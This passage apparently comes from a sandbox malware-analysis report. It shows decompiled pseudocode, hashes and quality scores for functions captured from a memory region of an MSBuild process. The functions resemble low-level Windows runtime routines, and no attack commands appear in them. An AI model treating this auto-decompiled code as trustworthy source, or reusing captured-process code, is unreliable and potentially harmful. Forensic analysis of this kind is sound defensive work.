                                            						_t38 =  *0x10f7b9c; // 0x0
                                            						_t62 = _t52 & 0x000000ff;
                                            						_t59 = L01024620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                            						if(_t59 == 0) {
                                            							_t37 = 0xc0000017;
                                            						} else {
                                            							_t56 = _v0;
                                            							 *(_t59 + 1) = _t52;
                                            							 *_t59 = 1;
                                            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                            							_t44 = _t62 - 1;
                                            							if(_t44 <= 7) {
                                            								switch( *((intOrPtr*)(_t44 * 4 +  &M0103E810))) {
                                            									case 0:
                                            										L6:
                                            										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                            										goto L7;
                                            									case 1:
                                            										L13:
                                            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                            										goto L6;
                                            									case 2:
                                            										L12:
                                            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                            										goto L13;
                                            									case 3:
                                            										L11:
                                            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                            										goto L12;
                                            									case 4:
                                            										L10:
                                            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                            										goto L11;
                                            									case 5:
                                            										L9:
                                            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                            										goto L10;
                                            									case 6:
                                            										L17:
                                            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                            										goto L9;
                                            									case 7:
                                            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                            										goto L17;
                                            								}
                                            							}
                                            							L7:
                                            							 *_a40 = _t59;
                                            							_t37 = 0;
                                            						}
                                            					}
                                            					return _t37;
                                            				} else {
                                            					_push(0x20);
                                            					asm("ror eax, cl");
                                            					return _a4 ^ _v8;
                                            				}
                                            			}


















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0103BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				intOrPtr _t22;
                                            				intOrPtr* _t41;
                                            				intOrPtr _t51;
                                            
                                            				_t51 =  *0x10f6100; // 0x5
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				if(_t51 >= 0x800) {
                                            					L12:
                                            					return 0;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				while(1) {
                                            					L1:
                                            					_t22 = _t51;
                                            					asm("lock cmpxchg [ecx], edx");
                                            					if(_t51 == _t22) {
                                            						break;
                                            					}
                                            					_t51 = _t22;
                                            					if(_t22 < 0x800) {
                                            						continue;
                                            					}
                                            					goto L12;
                                            				}
                                            				E01022280(0xd, 0x54cf1a0);
                                            				_t41 =  *0x10f60f8; // 0x0
                                            				if(_t41 != 0) {
                                            					 *0x10f60f8 =  *_t41;
                                            					 *0x10f60fc =  *0x10f60fc + 0xffff;
                                            				}
                                            				E0101FFB0(_t41, 0x800, 0x54cf1a0);
                                            				if(_t41 != 0) {
                                            					L6:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                            					do {
                                            						asm("lock xadd [0x10f60f0], ax");
                                            						 *((short*)(_t41 + 0x34)) = 1;
                                            					} while (1 == 0);
                                            					goto L8;
                                            				} else {
                                            					_t41 = L01024620(0x10f6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                            					if(_t41 == 0) {
                                            						L11:
                                            						asm("lock dec dword [0x10f6100]");
                                            						L8:
                                            						return _t41;
                                            					}
                                            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                            					if(_t41 == 0) {
                                            						goto L11;
                                            					}
                                            					goto L6;
                                            				}
                                            			}











                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e86beb5c8e1767dcfba3e153fef63e725877e0b9a5084f216cc9e1c075251ff9
                                            • Instruction ID: 663afde0b075f9ff762823b5d5378a95a65f49ae61fc2efb820f1e8035f14373
                                            • Opcode Fuzzy Hash: e86beb5c8e1767dcfba3e153fef63e725877e0b9a5084f216cc9e1c075251ff9
                                            • Instruction Fuzzy Hash: A3313636A006169FCB61EF58C4817AA73B8FF98314F140079EDC8DB205E77AD945CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E01009100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                            				signed int _t53;
                                            				signed int _t56;
                                            				signed int* _t60;
                                            				signed int _t63;
                                            				signed int _t66;
                                            				signed int _t69;
                                            				void* _t70;
                                            				intOrPtr* _t72;
                                            				void* _t78;
                                            				void* _t79;
                                            				signed int _t80;
                                            				intOrPtr _t82;
                                            				void* _t85;
                                            				void* _t88;
                                            				void* _t89;
                                            
                                            				_t84 = __esi;
                                            				_t70 = __ecx;
                                            				_t68 = __ebx;
                                            				_push(0x2c);
                                            				_push(0x10df6e8);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((char*)(_t85 - 0x1d)) = 0;
                                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                                            				if(_t82 == 0) {
                                            					L4:
                                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                            						E010D88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                            					}
                                            					L5:
                                            					return E0105D130(_t68, _t82, _t84);
                                            				}
                                            				_t88 = _t82 -  *0x10f86c0; // 0xac07b0
                                            				if(_t88 == 0) {
                                            					goto L4;
                                            				}
                                            				_t89 = _t82 -  *0x10f86b8; // 0x0
                                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					goto L4;
                                            				} else {
                                            					E01022280(_t82 + 0xe0, _t82 + 0xe0);
                                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                            					__eflags =  *((char*)(_t82 + 0xe5));
                                            					if(__eflags != 0) {
                                            						E010D88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                            						goto L12;
                                            					} else {
                                            						__eflags =  *((char*)(_t82 + 0xe4));
                                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                                            							 *((char*)(_t82 + 0xe4)) = 1;
                                            							_push(_t82);
                                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                                            							E0104AFD0();
                                            						}
                                            						while(1) {
                                            							_t60 = _t82 + 8;
                                            							 *(_t85 - 0x2c) = _t60;
                                            							_t68 =  *_t60;
                                            							_t80 = _t60[1];
                                            							 *(_t85 - 0x28) = _t68;
                                            							 *(_t85 - 0x24) = _t80;
                                            							while(1) {
                                            								L10:
                                            								__eflags = _t80;
                                            								if(_t80 == 0) {
                                            									break;
                                            								}
                                            								_t84 = _t68;
                                            								 *(_t85 - 0x30) = _t80;
                                            								 *(_t85 - 0x24) = _t80 - 1;
                                            								asm("lock cmpxchg8b [edi]");
                                            								_t68 = _t84;
                                            								 *(_t85 - 0x28) = _t68;
                                            								 *(_t85 - 0x24) = _t80;
                                            								__eflags = _t68 - _t84;
                                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                                            								if(_t68 != _t84) {
                                            									continue;
                                            								}
                                            								__eflags = _t80 -  *(_t85 - 0x30);
                                            								if(_t80 !=  *(_t85 - 0x30)) {
                                            									continue;
                                            								}
                                            								__eflags = _t80;
                                            								if(_t80 == 0) {
                                            									break;
                                            								}
                                            								_t63 = 0;
                                            								 *(_t85 - 0x34) = 0;
                                            								_t84 = 0;
                                            								__eflags = 0;
                                            								while(1) {
                                            									 *(_t85 - 0x3c) = _t84;
                                            									__eflags = _t84 - 3;
                                            									if(_t84 >= 3) {
                                            										break;
                                            									}
                                            									__eflags = _t63;
                                            									if(_t63 != 0) {
                                            										L40:
                                            										_t84 =  *_t63;
                                            										__eflags = _t84;
                                            										if(_t84 != 0) {
                                            											_t84 =  *(_t84 + 4);
                                            											__eflags = _t84;
                                            											if(_t84 != 0) {
                                            												 *0x10fb1e0(_t63, _t82);
                                            												 *_t84();
                                            											}
                                            										}
                                            										do {
                                            											_t60 = _t82 + 8;
                                            											 *(_t85 - 0x2c) = _t60;
                                            											_t68 =  *_t60;
                                            											_t80 = _t60[1];
                                            											 *(_t85 - 0x28) = _t68;
                                            											 *(_t85 - 0x24) = _t80;
                                            											goto L10;
                                            										} while (_t63 == 0);
                                            										goto L40;
                                            									}
                                            									_t69 = 0;
                                            									__eflags = 0;
                                            									while(1) {
                                            										 *(_t85 - 0x38) = _t69;
                                            										__eflags = _t69 -  *0x10f84c0;
                                            										if(_t69 >=  *0x10f84c0) {
                                            											break;
                                            										}
                                            										__eflags = _t63;
                                            										if(_t63 != 0) {
                                            											break;
                                            										}
                                            										_t66 = E010D9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                            										__eflags = _t66;
                                            										if(_t66 == 0) {
                                            											_t63 = 0;
                                            											__eflags = 0;
                                            										} else {
                                            											_t63 = _t66 + 0xfffffff4;
                                            										}
                                            										 *(_t85 - 0x34) = _t63;
                                            										_t69 = _t69 + 1;
                                            									}
                                            									_t84 = _t84 + 1;
                                            								}
                                            								__eflags = _t63;
                                            							}
                                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                            							 *((char*)(_t82 + 0xe5)) = 1;
                                            							 *((char*)(_t85 - 0x1d)) = 1;
                                            							L12:
                                            							 *(_t85 - 4) = 0xfffffffe;
                                            							E0100922A(_t82);
                                            							_t53 = E01027D50();
                                            							__eflags = _t53;
                                            							if(_t53 != 0) {
                                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            							} else {
                                            								_t56 = 0x7ffe0386;
                                            							}
                                            							__eflags =  *_t56;
                                            							if( *_t56 != 0) {
                                            								_t56 = E010D8B58(_t82);
                                            							}
                                            							__eflags =  *((char*)(_t85 - 0x1d));
                                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                                            								__eflags = _t82 -  *0x10f86c0; // 0xac07b0
                                            								if(__eflags != 0) {
                                            									__eflags = _t82 -  *0x10f86b8; // 0x0
                                            									if(__eflags == 0) {
                                            										_t79 = 0x10f86bc;
                                            										_t72 = 0x10f86b8;
                                            										goto L18;
                                            									}
                                            									__eflags = _t56 | 0xffffffff;
                                            									asm("lock xadd [edi], eax");
                                            									if(__eflags == 0) {
                                            										E01009240(_t68, _t82, _t82, _t84, __eflags);
                                            									}
                                            								} else {
                                            									_t79 = 0x10f86c4;
                                            									_t72 = 0x10f86c0;
                                            									L18:
                                            									E01039B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                            								}
                                            							}
                                            							goto L5;
                                            						}
                                            					}
                                            				}
                                            			}



















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 882b10093bda95735195df4737ed23bf0272862bc3555aa92c06452a6eacd0db
                                            • Instruction ID: 7213900b4d23c382c5ee90bc700e26bb682691cf2b0a6cdd69c609bc112a58f1
                                            • Opcode Fuzzy Hash: 882b10093bda95735195df4737ed23bf0272862bc3555aa92c06452a6eacd0db
                                            • Instruction Fuzzy Hash: E431A075B01245DFEB62DB6CC0887DDBBF1BB89318F18819EC58867282C335A980CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E01031DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr* _v20;
                                            				void* _t22;
                                            				char _t23;
                                            				void* _t36;
                                            				intOrPtr _t42;
                                            				intOrPtr _t43;
                                            
                                            				_v12 = __ecx;
                                            				_t43 = 0;
                                            				_v20 = __edx;
                                            				_t42 =  *__edx;
                                            				 *__edx = 0;
                                            				_v16 = _t42;
                                            				_push( &_v8);
                                            				_push(0);
                                            				_push(0);
                                            				_push(6);
                                            				_push(0);
                                            				_push(__ecx);
                                            				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                            				_push(_t36);
                                            				_t22 = E0102F460();
                                            				if(_t22 < 0) {
                                            					if(_t22 == 0xc0000023) {
                                            						goto L1;
                                            					}
                                            					L3:
                                            					return _t43;
                                            				}
                                            				L1:
                                            				_t23 = _v8;
                                            				if(_t23 != 0) {
                                            					_t38 = _a4;
                                            					if(_t23 >  *_a4) {
                                            						_t42 = L01024620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                            						if(_t42 == 0) {
                                            							goto L3;
                                            						}
                                            						_t23 = _v8;
                                            					}
                                            					_push( &_v8);
                                            					_push(_t23);
                                            					_push(_t42);
                                            					_push(6);
                                            					_push(_t43);
                                            					_push(_v12);
                                            					_push(_t36);
                                            					if(E0102F460() < 0) {
                                            						if(_t42 != 0 && _t42 != _v16) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                            						}
                                            						goto L3;
                                            					}
                                            					 *_v20 = _t42;
                                            					 *_a4 = _v8;
                                            				}
                                            				_t43 = 1;
                                            				goto L3;
                                            			}













                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                            • Instruction ID: 3501284a06afa20488a25eb62913912b2465cb794d53015887723ebccdcca341
                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                            • Instruction Fuzzy Hash: 8B217F72A00119FBD721CF59CC80EAABBBDEF89780F114095EA8597210D675AE01CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E01020050(void* __ecx) {
                                            				signed int _v8;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t30;
                                            				intOrPtr* _t31;
                                            				signed int _t34;
                                            				void* _t40;
                                            				void* _t41;
                                            				signed int _t44;
                                            				intOrPtr _t47;
                                            				signed int _t58;
                                            				void* _t59;
                                            				void* _t61;
                                            				void* _t62;
                                            				signed int _t64;
                                            
                                            				_push(__ecx);
                                            				_v8 =  *0x10fd360 ^ _t64;
                                            				_t61 = __ecx;
                                            				_t2 = _t61 + 0x20; // 0x20
                                            				E01039ED0(_t2, 1, 0);
                                            				_t52 =  *(_t61 + 0x8c);
                                            				_t4 = _t61 + 0x8c; // 0x8c
                                            				_t40 = _t4;
                                            				do {
                                            					_t44 = _t52;
                                            					_t58 = _t52 & 0x00000001;
                                            					_t24 = _t44;
                                            					asm("lock cmpxchg [ebx], edx");
                                            					_t52 = _t44;
                                            				} while (_t52 != _t44);
                                            				if(_t58 == 0) {
                                            					L7:
                                            					_pop(_t59);
                                            					_pop(_t62);
                                            					_pop(_t41);
                                            					return E0104B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                            				}
                                            				asm("lock xadd [esi], eax");
                                            				_t47 =  *[fs:0x18];
                                            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t30 != 0) {
                                            					if( *_t30 == 0) {
                                            						goto L4;
                                            					}
                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            					L5:
                                            					if( *_t31 != 0) {
                                            						_t18 = _t61 + 0x78; // 0x78
                                            						E010D8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                            					}
                                            					_t52 =  *(_t61 + 0x5c);
                                            					_t11 = _t61 + 0x78; // 0x78
                                            					_t34 = E01039702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                            					_t24 = _t34 | 0xffffffff;
                                            					asm("lock xadd [esi], eax");
                                            					if((_t34 | 0xffffffff) == 0) {
                                            						 *0x10fb1e0(_t61);
                                            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                            					}
                                            					goto L7;
                                            				}
                                            				L4:
                                            				_t31 = 0x7ffe0386;
                                            				goto L5;
                                            			}





















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88a2178a0f90c65a2f993bbec6c1051073211fe10702ee5d994bf2f56c1f891f
                                            • Instruction ID: e0a6a8ad695ac65140a1af099c54862184d38c15bf636a88dcc81509ff06cd33
                                            • Opcode Fuzzy Hash: 88a2178a0f90c65a2f993bbec6c1051073211fe10702ee5d994bf2f56c1f891f
                                            • Instruction Fuzzy Hash: 0231AE31201B05CFE762CB28C884B9AB3E5FF88714F1485ADF5D687B94EB75A801CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E01086C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                            				signed short* _v8;
                                            				signed char _v12;
                                            				void* _t22;
                                            				signed char* _t23;
                                            				intOrPtr _t24;
                                            				signed short* _t44;
                                            				void* _t47;
                                            				signed char* _t56;
                                            				signed char* _t58;
                                            
                                            				_t48 = __ecx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t44 = __ecx;
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				_t22 = E01027D50();
                                            				_t58 = 0x7ffe0384;
                                            				if(_t22 == 0) {
                                            					_t23 = 0x7ffe0384;
                                            				} else {
                                            					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            				}
                                            				if( *_t23 != 0) {
                                            					_t24 =  *0x10f7b9c; // 0x0
                                            					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                            					_t23 = L01024620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                            					_t56 = _t23;
                                            					if(_t56 != 0) {
                                            						_t56[0x24] = _a4;
                                            						_t56[0x28] = _a8;
                                            						_t56[6] = 0x1420;
                                            						_t56[0x20] = _v12;
                                            						_t14 =  &(_t56[0x2c]); // 0x2c
                                            						E0104F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                            						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                            						if(E01027D50() != 0) {
                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            						}
                                            						_push(_t56);
                                            						_push(_t47 - 0x20);
                                            						_push(0x402);
                                            						_push( *_t58 & 0x000000ff);
                                            						E01049AE0();
                                            						_t23 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                            					}
                                            				}
                                            				return _t23;
                                            			}













                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7791a1d37e3450316945e624b3d5bec8551e49a837641dd904a09dccb41bfdec
                                            • Instruction ID: 2956dd1230c1b2642755183b4587c2eaed5733a32e880b5494aeb2670f1b4c80
                                            • Opcode Fuzzy Hash: 7791a1d37e3450316945e624b3d5bec8551e49a837641dd904a09dccb41bfdec
                                            • Instruction Fuzzy Hash: 3421ADB1A00659AFD711EB68D980F6AB7B8FF58700F0440A9FA84C7B90D635ED10CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E010490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                            				intOrPtr* _v0;
                                            				void* _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				char _v36;
                                            				void* _t38;
                                            				intOrPtr _t41;
                                            				void* _t44;
                                            				signed int _t45;
                                            				intOrPtr* _t49;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				intOrPtr* _t59;
                                            				void* _t62;
                                            				void* _t63;
                                            				void* _t65;
                                            				void* _t66;
                                            				signed int _t69;
                                            				intOrPtr* _t70;
                                            				void* _t71;
                                            				intOrPtr* _t72;
                                            				intOrPtr* _t73;
                                            				char _t74;
                                            
                                            				_t65 = __edx;
                                            				_t57 = _a4;
                                            				_t32 = __ecx;
                                            				_v8 = __edx;
                                            				_t3 = _t32 + 0x14c; // 0x14c
                                            				_t70 = _t3;
                                            				_v16 = __ecx;
                                            				_t72 =  *_t70;
                                            				while(_t72 != _t70) {
                                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                            						L24:
                                            						_t72 =  *_t72;
                                            						continue;
                                            					}
                                            					_t30 = _t72 + 0x10; // 0x10
                                            					if(E0105D4F0(_t30, _t65, _t57) == _t57) {
                                            						return 0xb7;
                                            					}
                                            					_t65 = _v8;
                                            					goto L24;
                                            				}
                                            				_t61 = _t57;
                                            				_push( &_v12);
                                            				_t66 = 0x10;
                                            				if(E0103E5E0(_t57, _t66) < 0) {
                                            					return 0x216;
                                            				}
                                            				_t73 = L01024620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                            				if(_t73 == 0) {
                                            					_t38 = 0xe;
                                            					return _t38;
                                            				}
                                            				_t9 = _t73 + 0x10; // 0x10
                                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                            				E0104F3E0(_t9, _v8, _t57);
                                            				_t41 =  *_t70;
                                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                            					_t62 = 3;
                                            					asm("int 0x29");
                                            					_push(_t62);
                                            					_push(_t57);
                                            					_push(_t73);
                                            					_push(_t70);
                                            					_t71 = _t62;
                                            					_t74 = 0;
                                            					_v36 = 0;
                                            					_t63 = E0103A2F0(_t62, _t71, 1, 6,  &_v36);
                                            					if(_t63 == 0) {
                                            						L20:
                                            						_t44 = 0x57;
                                            						return _t44;
                                            					}
                                            					_t45 = _v12;
                                            					_t58 = 0x1c;
                                            					if(_t45 < _t58) {
                                            						goto L20;
                                            					}
                                            					_t69 = _t45 / _t58;
                                            					if(_t69 == 0) {
                                            						L19:
                                            						return 0xe8;
                                            					}
                                            					_t59 = _v0;
                                            					do {
                                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                            							goto L18;
                                            						}
                                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                            						 *_t59 = _t49;
                                            						if( *_t49 != 0x53445352) {
                                            							goto L18;
                                            						}
                                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                            						return 0;
                                            						L18:
                                            						_t63 = _t63 + 0x1c;
                                            						_t74 = _t74 + 1;
                                            					} while (_t74 < _t69);
                                            					goto L19;
                                            				}
                                            				 *_t73 = _t41;
                                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                            				 *_t70 = _t73;
                                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                            				return 0;
                                            			}



























                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                            • Instruction ID: 52edd264844b2fb33920d39598dfd719ba7e68d2c70cfd259e946dd4e6f56f39
                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                            • Instruction Fuzzy Hash: 1C2183B1A00205EFDB21DF59C484AAAFBF8EF58314F14847AE9C597210D730ED40CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E01033B7A(void* __ecx) {
                                            				signed int _v8;
                                            				char _v12;
                                            				intOrPtr _v20;
                                            				intOrPtr _t17;
                                            				intOrPtr _t26;
                                            				void* _t35;
                                            				void* _t38;
                                            				void* _t41;
                                            				intOrPtr _t44;
                                            
                                            				_t17 =  *0x10f84c4; // 0x0
                                            				_v12 = 1;
                                            				_v8 =  *0x10f84c0 * 0x4c;
                                            				_t41 = __ecx;
                                            				_t35 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10f84c0 * 0x4c);
                                            				if(_t35 == 0) {
                                            					_t44 = 0xc0000017;
                                            				} else {
                                            					_push( &_v8);
                                            					_push(_v8);
                                            					_push(_t35);
                                            					_push(4);
                                            					_push( &_v12);
                                            					_push(0x6b);
                                            					_t44 = E0104AA90();
                                            					_v20 = _t44;
                                            					if(_t44 >= 0) {
                                            						E0104FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10f84c0 * 0xc);
                                            						_t38 = _t35;
                                            						if(_t35 < _v8 + _t35) {
                                            							do {
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                            							} while (_t38 < _v8 + _t35);
                                            							_t44 = _v20;
                                            						}
                                            					}
                                            					_t26 =  *0x10f84c4; // 0x0
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                            				}
                                            				return _t44;
                                            			}













                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acec9d8f5410bae490c17cd4a10e517f5934276116ed99f6edc93e6b5bf5ae45
                                            • Instruction ID: 072ef1b4ce469c153fa5262ec6ebeacad9188e73c7687ee00ea5289dde2d6964
                                            • Opcode Fuzzy Hash: acec9d8f5410bae490c17cd4a10e517f5934276116ed99f6edc93e6b5bf5ae45
                                            • Instruction Fuzzy Hash: 7621CFB2A00109AFDB10DF58CD81B9ABBBDFB44308F154069EA49AB252C776ED11CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E01086CF0(void* __edx, intOrPtr _a4, short _a8) {
                                            				char _v8;
                                            				char _v12;
                                            				char _v16;
                                            				char _v20;
                                            				char _v28;
                                            				char _v36;
                                            				char _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed char* _t21;
                                            				void* _t24;
                                            				void* _t36;
                                            				void* _t38;
                                            				void* _t46;
                                            
                                            				_push(_t36);
                                            				_t46 = __edx;
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0384;
                                            				} else {
                                            					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                            				}
                                            				if( *_t21 != 0) {
                                            					_t21 =  *[fs:0x30];
                                            					if((_t21[0x240] & 0x00000004) != 0) {
                                            						if(E01027D50() == 0) {
                                            							_t21 = 0x7ffe0385;
                                            						} else {
